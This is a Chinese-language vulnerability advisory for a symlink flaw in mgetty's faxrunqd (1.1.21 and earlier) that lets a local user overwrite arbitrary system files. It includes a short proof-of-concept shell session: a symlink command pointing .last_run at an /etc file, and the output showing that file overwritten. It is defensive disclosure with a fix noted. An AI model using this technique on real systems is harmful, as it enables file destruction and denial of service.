受影響系統(tǒng):
mgetty 1.1.21以及更低版本
- Linux redhat 6.2以及更低版本
- Linux-Mandrake 7.1 以及更低版本
- 其他使用有問題mgetty的unix系統(tǒng)
不受影響系統(tǒng):
mgetty 1.1.22
描述:
mgetty中帶了一個faxrunqd程序,它用來發(fā)送faxspool(1)產(chǎn)生的傳真隊列中的任務(wù)��。
在執(zhí)行時�����,該程序會在/var/spool/outgoing/目錄下創(chuàng)建一個.last_run文件,這個目錄是任何人可寫的����。在某些mgetty版本中所帶的faxrunqd沒有檢查該文件是否存在或是鏈接文件,因此攻擊者可能覆蓋任意系統(tǒng)文件����,造成拒絕服務(wù)攻擊。
<* 來源: Stan Bubrouski ([email protected])*>
測試方法:
警 告
以下程序(方法)可能帶有攻擊性�����,僅供安全研究與教學(xué)之用��。使用者風(fēng)險自負(fù)!
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...
Remote unprivilaged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
建議:
mgetty 1.1.22已經(jīng)解決了這個問題��,您可以在下列地址下載:http://alpha.greenie.net/mgetty/
關(guān)鍵詞標(biāo)簽:拒絕服務(wù)攻擊,Linux,f
提示dns服務(wù)錯誤怎么辦 dns錯誤問題多種解決方法